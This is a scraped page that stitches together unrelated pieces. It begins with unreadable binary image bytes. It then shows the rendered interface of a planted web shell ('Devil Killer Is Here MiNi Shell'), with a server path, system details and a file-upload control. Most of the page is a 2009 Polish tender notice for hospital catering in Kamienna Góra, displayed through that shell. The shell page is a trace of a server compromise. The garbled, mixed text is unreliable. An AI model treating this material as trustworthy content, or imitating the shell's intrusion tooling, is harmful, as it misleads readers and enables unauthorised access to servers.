JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090302/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090302/45330-N-2009.html

<p class="kh_header"><b>Kamienna Góra: świadczenie usług żywienia zbiorowego wraz  z dystrybucją  posiłków w oddziały szpitalne dla pacjentów hospitalizowanych w Powiatowym Centrum Zdrowia w Kamiennej Górze</b><br>
<b>Numer ogłoszenia: 45330 - 2009; data zamieszczenia: 02.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Zdrowia w Kamiennej Górze Sp. z o.o. Niepubliczny Zakład Opieki Zdrowotnej Szpital Powiatowy , ul. Bohaterów Getta 10, 58-400 Kamienna Góra, woj. dolnośląskie, tel. 075 7449033.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcz.org.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny Zakład Opieki Zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie usług żywienia zbiorowego wraz  z dystrybucją  posiłków w oddziały szpitalne dla pacjentów hospitalizowanych w Powiatowym Centrum Zdrowia w Kamiennej Górze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Powiatowe  Centrum Zdrowia w Kamiennej Górze  sp zoo Niepubliczny Zakład Opieki Zdrowotnej Szpital Powiatowy  zaprasza  do udziału w postępowaniu prowadzonym w trybie przetargu nieograniczonego nr 4/2009 na  świadczenie usług   usług  żywienia zbiorowego dla hospitalizowanych pacjentów na miejscu w budynku Powiatowego Centrum Zdrowia w Kamiennej Górze.
Usługi żywienia zbiorowego  będą się odbywały na miejscu w Szpitalu Powiatowym w Kamiennej Górze przy ulicy Bohaterów Getta 10  w zakresie:
       a) sporządzania całodziennych  posiłków   dla pacjentów z uwzględnieniem diet  indywidualnych,
b) dystrybucji posiłków w systemie tackowym na poszczególne oddziały, 
c) podawania i odbioru tacek od pacjentów i ich transportowanie do kuchni  po skończonym posiłku,
d)  utylizacji resztek i odpadów pokonsumpcyjnych,
e)  mycia naczyń,  wózków i sprzętu w zmywaku,
f) utrzymania  w czystości pomieszczeń kuchni z zapleczem oraz  przechowywania  sprzętu i urządzeń do   dystrybucji  posiłków,
g) codzienne sporządzanie jadłospisów oraz przekazywanie do oddziałów, 
h) sporządzanie jadłospisów dekadowych wraz z określeniem kaloryczności  posiłków. 

      Transport posiłków w oddziały szpitalne winien być zgodny z obowiązującymi przepisami. Pojazdy przeznaczone do transportu posiłków winny być na bieżąco  poddawane  myciu i dezynfekcji.  Oferent winien posiadać niezbędne uprawnienia  do wykonania przedmiotu zamówienia oraz  nowoczesne wyposażenie techniczne. Oferent zobowiązuje się wykonać całość przedmiotu zamówienia przy współpracy  z Zamawiającym. Usługi żywienia zbiorowego  będą wykonywane na  terenie obiektu szpitala i będą   podlegały ocenie wewnętrznej Zamawiającego. Zamawiający wyznaczy Naczelną pielęgniarkę do nadzoru jakości przygotowywanych i dystrybuowanych posiłków   a  do bezpośredniego kontaktu w sprawach utrzymania reżimu sanitarnego świadczonej usługi Zamawiający wyznaczy pielęgniarkę epidemiologiczną. 
       Usługi żywienia zbiorowego  będą podlegały ocenie wewnętrznej Zamawiającego. Raz na kwartał zostanie sporządzany protokół stwierdzający jakość wykonywanych usług i podpisany przez przedstawicieli Stron.    Również Wykonawca zapewni codzienny nadzór nad personelem dystrybuującym. Wykonawca zobowiązuje się do wykonania usług z zachowaniem wszelkich przepisów sanitarnych i higienicznych jakie są wymagane do tego rodzaju usług.
Za przestrzeganie przepisów sanitarnych, bhp oraz  p. poż. przy świadczeniu usług odpowiedzialność ponosi Wykonawca.  
Wykonawca odpowiada bezpośrednio przed organami nadzorująco - kontrolnymi za utrzymanie   reżimu sanitarnego w zakresie świadczonej usługi żywienia zbiorowego. Wykonawca winien posiadać uprawnienia do prowadzenia usług żywienia zbiorowego.
Firma zobowiązuje się do:
świadczenia  dobrej jakości  usługi zgodnie z normami  żywieniowymi, sanitarnymi i innymi obowiązującymi  przepisami prawa w tym zakresie, 
-      organizacji pracy w sposób zapewniający szczególną staranność  i należyte wykonanie przedmiotu zamówienia.
Usługi żywienia zbiorowego wraz z dystrybucją będą się odbywały na terenie obiektu Szpitala Powiatowego w Kamiennej Górze przy ul. Bohaterów Getta 10 w związku z powyższym oferent zapozna się z obiektem szpitala i  pomieszczeniami, gdzie świadczone będą usługi żywienia zbiorowego oraz dystrybucji.
Oferent, który wygra przetarg  jest zobowiązany zapewnić własny personel w takiej ilości osób, która zapewni należyte wykonanie usługi.  Zamawiający nadmienia, iż kuchnia szpitalna została sprywatyzowana w roku 1999  w związku z czym do obowiązków przyszłego Wykonawcy nie będzie należało przejmowanie  pracowników Zamawiającego.  Do  profesjonalnego   wykonywania usługi wykonawca  użyje  sprzętu gastronomicznego (lub będzie dzierżawił  uzupełniając sprzęt   Zamawiającego przekazany w drodze dzierżawy)  oraz artykułów żywnościowych przez siebie zakupionych. 
Zamawiający informuje, ze istnieje możliwość wydzierżawienia sprzętu   obecnie wykorzystywanego do świadczenia posiłków (tj. tacki termoizolacyjne oraz wózki do transportu posiłków) oraz pomieszczenia do jego przekazywania i mycia  na podstawie odrębnej umowy. Zaleca się jednak uzupełnienie brakującego i niezbędnego sprzętu do dystrybucji  na koszt własny oferenta.
Zamawiający wydzierżawi wykonawcy  sprzęt i urządzenia gastronomiczne znajdujące się w pomieszczeniach kuchni centralnej, do świadczenia  usług żywieniowych i dystrybucji posiłków będący jego własnością.
W  przypadku chęci dzierżawy urządzeń w związku z obowiązkiem kompleksowego i profesjonalnego wykonania usługi żywienia zbiorowego wraz z dystrybucją posiłków w oddziały szpitalne - Wykonawca uzupełni sprzęt gastronomiczny  Zamawiającego i zakupi min. niezbędny sprzęt: termosy, czajniki, lodówki, zamrażarki, talerze, pokrywki, garnki, szafa)  i  wkalkuluje go w wartość świadczonej kompleksowej usługi. 
Zamawiającemu chodzi o termosy   w ilości ok. 5 sztuk, które będą przeznaczone na herbatę dla pacjentów na oddziały szpitalne.  
W przypadku  pozostałego  sprzętu tj.: lodówki, zamrażarki oraz brakujące niezbędne rzeczy jak: talerze (płaskie, głębokie), garnki, miski na zupę, miski - salaterki,  szkło, pokrywki, sztućce czy wiadra metalowe, plastikowe itd.   przyszły Wykonawca winien uzupełnić i doposażyć w ilość jaką sam uzna za konieczną z uwagi na częstotliwość realizowania zamówienia żywności. Zakup brakującego asortymentu należy zrealizować w przeliczeniu na  ilość dziennych  posiłków, co zostało podane w siwz i wynosi ok. 70 dziennie + zapas (tłukące szkło). 
Sprzęt i środki  chemiczne, które będą używane przez przyszłego Wykonawcę do wykonywania usługi  - winny spełniać warunki takie, jak sprzęt stosowany w placówkach służby zdrowia i być dopuszczone do obrotu w  placówkach służby zdrowia.
Zamawiający informuje, iż urządzenia AGD zamieszczone w zał nr ł nie podlegają UDT.
Zamawiający zobowiązuje się oddać wykonawcy w najem pomieszczenie na poziomie przyziemia o  powierzchni 250,30 m2 mieszczące się w PCZ  sp zoo przy ulicy Bohaterów Getta 10 w Kamiennej Górze  wraz  ze znajdującymi się tam urządzeniami do dystrybucji posiłków.
Sprzęt stanowiący własność Zamawiającego będzie wynajmowany według spisu inwentaryzacyjnego - jednak nie później niż w dniu następnym  po podpisaniu  umowy. 
Zamawiający wymaga od oferenta zapoznania się z podstawowymi zasadami pracy w szpitalu i stosowania ich tak, aby  realizacja zamówienia nie utrudniała pracy  personelowi medycznemu, pacjentom i  innym firmom. 
Od Wykonawcy wymaga się również posiadanie umiejętności i wiedzy w zakresie przepisów wewnątrz kuchennych, organizacji pracy jak i znajomości uprawnień na określonych stanowiskach pracy. 
W związku z  wejściem Polski do Unii Europejskiej z dniem 01.05.2004r. firma, która wygra przetarg zobowiązana jest do  w prowadzenia systemu HACCP.
Zamawiający informuje, że usługi żywienia zbiorowego dotyczą hospitalizowanych pacjentów. Kwestia żywienia pracowników  szpitala, nie dotyczy przetargu, jest to indywidualne podejście każdego oferenta do tematu.
W związku z wymogiem odbioru i utylizacji odpadków  pokonsumpcyjnych przez Wykonawcę - Zamawiający udostępni Wykonawcy odpowiednio usytuowane miejsce  (miejsce takie znajduje się przed wejściem bocznym do szpitala od strony kotłowni  lub przed warsztatem, gdzie znajduje się kontener na śmieci komunalne). 
Zamawiający informuje, iż stan techniczny  oraz sanitarny pomieszczeń, które będą podlegały dzierżawie jest dobry  i spełnia wytyczne  oraz zalecenia sanepidu, w tym wymogi sanitarne i epidemiologiczne zgodnie z obowiązującymi przepisami w tym Rozporządzenia Ministra Zdrowia  z dnia 10 listopada 2006r.  W sprawie, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej (Dz. U. 213, poz. 1568). Pomieszczenia te są gotowe do realizowania w nich przedmiotu zamówienia bez dokonywania inwestycji. Szpital  na bieżąco  realizuje wszystkie zalecenia sanepidu dotyczące otoczenia kuchni i dojść do niej (w chwili obecnej ma decyzję dotyczącą dojścia do kuchni od strony parkingu). Natomiast zalecenia SANEPID-u dotyczące stanu sanitarno - technicznego wewnątrz kuchni, jak i jej pomieszczeń realizuje sam dzierżawca. W chwili przekazania kuchni obecnemu dzierżawcy, kuchnia spełniała wymogi wyżej cytowanego Rozporządzenia. Pomieszczenie to jest wentylowane. Na podłodze znajdują się płytki podłogowe, tzw. glazura.  Powierzchnia jest zmywalna.  
Wykonawca  będzie ponosił opłaty eksploatacyjne osobno wg obowiązujących stawek i wskazania licznika:
        -  opłata za energię  elektryczną  
        -  opłata za gaz
Natomiast na koszt dzierżawy kuchni i jej zaplecza  składają się następujące koszty:
-    wynajmu pomieszczeń kuchennych i magazynu,
-    dzierżawy sprzętu gastronomicznego,
      -   zużycia wody  zimnej i ciepłej oraz wywozu nieczystości stałych - według których zamawiający będzie wystawiał fakturę 
     vat,
-    udostępnienie miejsca na odpadki. 
Koszt dzierżawy w/w mediów i pomieszczeń w skali miesiąca wynosi 3.750 PLN  złotych netto plus 22% podatku vat. Wykaz sprzętu gastronomicznego, który będzie podlegał dzierżawie został dołączony do  siwz w formie załącznika. 
Zamawiający  informuje, że średnio-miesięczne zużycie energii wykorzystywanej na potrzeby kuchni  wynosi  1300 kwh, gazu - w ilości 300 m3. 
        W szpitalu stosowany jest następujący schemat diet, jak w załączniku nr o.
 
        Ilości prowadzonych diet są uzależnione od zaleceń lekarskich. Zamawiający informuje, że w przypadku pacjentów będących na dietach poza cukrzycą liczba posiłków w ciągu dnia wynosi 3: śniadanie, obiad, kolacja. Pacjenci na diecie cukrzycowej  - liczba posiłków  równa się 5: śniadanie, 2-gie śniadanie, obiad, podwieczorek, kolacja. W przypadku dzieci: śniadanie, II śniadanie (owoce, soki wg norm żywieniowych),  podwieczorek i kolacja.   
      Zamawiający nie  prowadzi kuchni mlecznej - żywienie pacjentów hospitalizowanych nie obejmuje tzw. małych pacjentów   (noworodki) są żywione w oddziale neonatologiczno - położniczym  wg innych zasad (gotowymi mieszankami z apteki szpitalnej lub we własnym zakresie pacjenta), tak więc usługa nie obejmuje żywienia noworodków. 
Oferta  cenowa powinna być podana w PLN zł  oraz winna zawierać cenę jednostkową - stawkę żywieniową  za jeden dzień obejmującą trzy posiłki dziennie: (śniadanie, obiad, kolacja) na jednego pacjenta  oraz umowną wartość oferty za rok.
Oferta  cenowa winna zawierać  całkowity koszt wykonania  usługi za okres 30  miesięcy, który oznacza faktyczną ilość stawek żywieniowych dziennych przypadających na jednego pacjenta  w ciągu roku  pomnożoną przez cenę jedn. (stawkę żywieniową za jeden dzień).
Wykonawca zobowiązany jest do zachowania szczególnej staranności przy wykonywaniu zamówienia, przy uwzględnieniu specyficznego  charakteru prowadzonej działalności.
Wykonawca zobowiązuje się do wykonania usług z zachowaniem wszelkich przepisów i norm sanitarnych i higienicznych i bhp  jakie są wymagane do tego rodzaju usług.
Wykonawca odpowiada bezpośrednio przed organami nadzorująco - kontrolnymi zamawiającego za utrzymanie reżimu sanitarnego żywienia zbiorowego.
Wykonawca ponosi odpowiedzialność za niewykonanie lub nienależyte wykonanie przedmiotu umowy.
Wykonawca ponosi odpowiedzialność za szkody powstałe na: osobach i mieniu osób przebywających na terenie szpitala oraz mieniu zamawiającego, które wynikły z niewykonania, bądź nie należytego wykonania przedmiotu umowy.
Zamawiający przedstawia niezbędne dla oferenta informacje w formie załączników:
-      spis urządzeń gastronomicznych do dystrybucji posiłków 
harmonogram dystrybucji posiłków w oddziały szpitalne.
-      normy żywienia zbiorowego 
Ilość łóżek przypadających w rozbiciu na oddziały szpitalne w ciągu 2008 roku wyniosła 162 sztuki.  
Ilość przyjęć pacjentów w ciągu 2008  roku 6 240   osób. 
Średnie obłożenie łóżka w ciągu 2008  roku wyniosło 55%. 
W ciągu 30 m.-cy 64 252  stawek żywieniowych dziennych.
Zamawiający informuje, że średnio dziennie w naszej placówce jest wydawanych  około 70  posiłków. 
Szczegółowe warunki usługi  określa się w umowie zał nr g,  g1.  Zamówienie to jest finansowane ze środków własnych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 55.51.10.00-0, 55.50.00.00-5, 55.51.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W związku z wartością  przekraczającą 206 000 EURO Zamawiający wymaga dokonania wpłaty wadium art. 45 ust.1. Wadium wnosi się przed upływem terminu składania ofert. Zamawiający przyjął wadium w wysokości 1% wartości  zamówienia netto za okres  trwania umowy ok. 30m-cy. 
Wysokość kwoty wadium   wynosi: 7 000,00 PLN złotych (słownie: siedem tysięcy PLN  złotych zero groszy).   Wadium musi być wniesione przed upływem ostatecznego terminu do składania ofert.  Wadium należy wnieść w formie oryginału w każdej z dopuszczalnych form  przez ustawodawcę.
Wadium może być wnoszone w jednej lub kilku następujących formach:
pieniądzu;
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
gwarancjach bankowych;
gwarancjach ubezpieczeniowych;
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, ze zmn. ) 
        Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. W przypadku wniesienia wadium w formie pieniężnej tj.  przelewu środków  Wykonawca winien operację taką  wykonać  w terminie odpowiednio wcześniejszym z uwagi na  datę wpływu środków pieniężnych na konto i obowiązek udokumentowania tego faktu  w ofercie przetargowej!

Bank Spółdzielczy w Kamiennej  Górze
Nr konta: 75 8395 0001 0012 0144 2003 0002

Jeżeli wadium zostanie wniesione w pieniądzu - przelewem, Wykonawca dołącza do oferty oryginał przelewu lub kopię (potwierdzoną za zgodność z oryginałem przez osobę uprawnioną do podpisu oferty przetargowej) wpłaty wadium z potwierdzeniem dokonanego przelewu. Na poleceniu przelewu należy wpisać: wadium pn  nr 4/2009

W pozostałych przypadkach wymagane jest dołączenie oryginału dokumentu wystawionego na rzecz Zamawiającego.
Fakt złożenia wadium w każdej  przewidzianej formie przez ustawę  (przelew i inne), należy dołączyć do oferty przetargowej jako integralną jej część zał nr k.
Dokumenty w/w  muszą zachowywać ważność przez cały okres, w którym Wykonawca jest związany ofertą.  
W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu w terminie decydować będzie data wpływu środków na rachunek bankowy Zamawiającego wskazany wyżej.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków
O zamówienie mogą ubiegać się wykonawcy, spełniający  następujące  podstawowe  warunki:

a)nie podlegają  wykluczeniu na podstawie art. 24 ust. 1 pkt. 1 - 10 oraz spełniają warunki określone w art. 22 ust.1 pkt.  1 - 4 ustawy;
b)spełnią  warunki podstawowe przedmiotu zamówienia określone w  rozdziale I,  II i III  i inne wymogi określone w siwz w tym również zaakceptują projekty umów;
c)posiadają koncesję, zezwolenie lub licencję, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym; 
d)dostarczą ofertę sporządzoną wg siwz  wraz z wypełnionymi następującymi formularzami określonymi w rozdziale III siwz;
e)posiadają  doświadczenie z ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia z podaniem ich wartości oraz daty, miejsca  wykonania wraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie;
f)posiadają umiejętności i wiedzę w zakresie organizacji pracy,  żywienia zbiorowego i a także znajomości uprawnień wymaganych na określonych stanowiskach pracy oraz zobowiąże się do wykonania prac przy zastosowaniu własnych sił, materiałów,  narzędzi i urządzeń;
g) zatrudnią  taką ilość osób, która zapewni należyte wykonanie usług  określonych w siwz;
h)zdobędą  na swoją własną odpowiedzialność i ryzyko, wszelkie dodatkowe informacje, które mogą być konieczne do przygotowania oferty oraz zawarcia umowy i wykonania zamówienia (pożądane jest dokonanie wizji lokalnej na koszt własny);
i)nie powinien posiadać żadnych spraw PIH-u oraz nie być karany sądownie  w szczególności za sprawy związane z procedurami o zamówienie publiczne;  
j)dysponują  sprzętem   niezbędnym do właściwej  realizacji zamówienia  lub uzupełni brakujący sprzęt; 
k)posiada umiejętność i wiedzę w zakresie przepisów wewnątrz kuchennych, organizacji pracy jak i znajomości uprawnień na określonych stanowiskach pracy związaną z reżimem sanitarnym świadczonej usługi;
l)będzie świadczył  usługi w zakresie żywienia zbiorowego w systemie HACCP przy użyciu własnego sprzętu, artykułów żywnościowych zakupionych przez siebie oraz zgodnie z normami wyżywienia dla chorych dzieci i dorosłych oraz harmonogramem dystrybucji posiłków;
m)zobowiąże się do naboru, przeszkolenia, motywowania i nadzoru nad pracownikami w celu uzyskania dobrej jakości całości usługi;
n)przejmie pełną odpowiedzialność za stan sanitarno - epid.   wynikającą z zakresu świadczonych usług przed organami kontroli placówek służby zdrowia;
o)uwzględni wszystkie prace i czynności  opisane w siwz oraz w załącznikach do siwz  związane ze świadczeniem przedmiotowej usługi, gdyż Zamawiający przyjmuje, że ich koszt został pokryty przez inne ceny podane w ofercie przetargowej; 
p)zapozna się z podstawowymi zasadami pracy w szpitalu i będzie stosował je tak, aby realizacja zamówienia nie utrudniała pracy personelowi medycznemu, pacjentom i firmie;
q)przejmie odpowiedzialność przed organami kontrolnymi za realizacje usługi:  sanitarno - epid., pip, pih, p.poż i bhp itp.
r)zrealizują usługi  w  terminie pożądanym przez zamawiającego, tj. 30 m-cy;
s)jest  ubezpieczona  od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej;
t) wniesie wadium w wysokości:  7.000 PLN złotych.
u)zapewnią minimalny termin płatności: 30 dni od  daty wystawienia  faktury Vat;

Warunki te będą spełnione przez Wykonawcę, jeżeli potwierdzą  je dokumenty, o których mowa w rozdziale III. Ocena powyższych  warunków wymaganych od oferentów zostanie dokonana na podstawie złożonych wraz z ofertą oświadczeń, dokumentów i wykazów, o których mowa w rozdziale III   wg formuły spełnia - nie spełnia.
Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem oferenta z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawcy ubiegający się o uzyskanie zamówienia dostarczą zgodnie z   poniższym wykazem wypełnione  oświadczenia i dokumenty (które należy zaparafować i przedstawić w formie załączników do oferty, stanowiących integralną jej część):

1	 formularze: 
 
1.1	 formularz ofertowy zał nr a
1.2	oświadczenie oferenta nr b
1.3	oświadczenie w sprawie stosowania się do siwz zał nr c
1.4        formularz upoważnienia do podpisania oferty zał nr d*
1.5        formularz cenowy  nr  e 
1.6        projekt  umowy zał nr g i g1
1.7        podwykonawcy zał nr h
1.8        oświadczenie oferenta o spełnianiu warunków udziału w postępowaniu zał nr j 
1.9        dowód wpłaty wadium - zał  nr k
1.10         Harmonogram dystrybucji posiłków w oddziały szpitalne - zał nr l
1.11       Spis urządzeń gastronomicznych do dystrybucji posiłków  do wydzierżawienia, spis urządzeń gastronomicznych 
       pozostałych - zał  nr  ł
1.12        dokument ubezpieczenia - zał nr m
1.13        Normy wyżywienia dla chorych dzieci i dorosłych i zbiory receptur - zal nr n
1.14       wykaz diet - zał nr o 

2. W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy  Zamawiający żąda następujących dokumentów (w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę):
-       aktualnego odpisu z właściwego  rejestru albo aktualnego zaświadczenia o  wpisie do  ewidencji działalności  gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia  do ewidencji    działalności gospodarczej, wystawionego nie wcześniej niż  6 miesięcy przed upływem terminu  składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - zał nr 1;
-     aktualnych   zaświadczeń  właściwego naczelnika urzędu  skarbowego oraz właściwego oddziału  Zakładu Ubezpieczeń  Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzających odpowiednio, że wykonawca   nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i  społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie  na raty zaległych płatności lub wstrzymanie w całości  wykonania decyzji właściwego  organu, wystawionych nie wcześniej niż   3 miesiące przed upływem terminu składania  ofert - zał nr 2;
-       aktualnej  informacji z Krajowego  Rejestru Karnego  w zakresie określonym w art. 24 ust. 1 pkt. 4 - 8 ustawy, wystawionej  nie wcześniej niż  6 miesięcy przed upływem terminu  składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego albo składania ofert   -  zał  nr 3;
aktualnej  informacji z Krajowego  Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy, wystawionej nie wcześniej niż  6 miesięcy przed upływem terminu  składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego albo składania ofert - zał  nr 4;
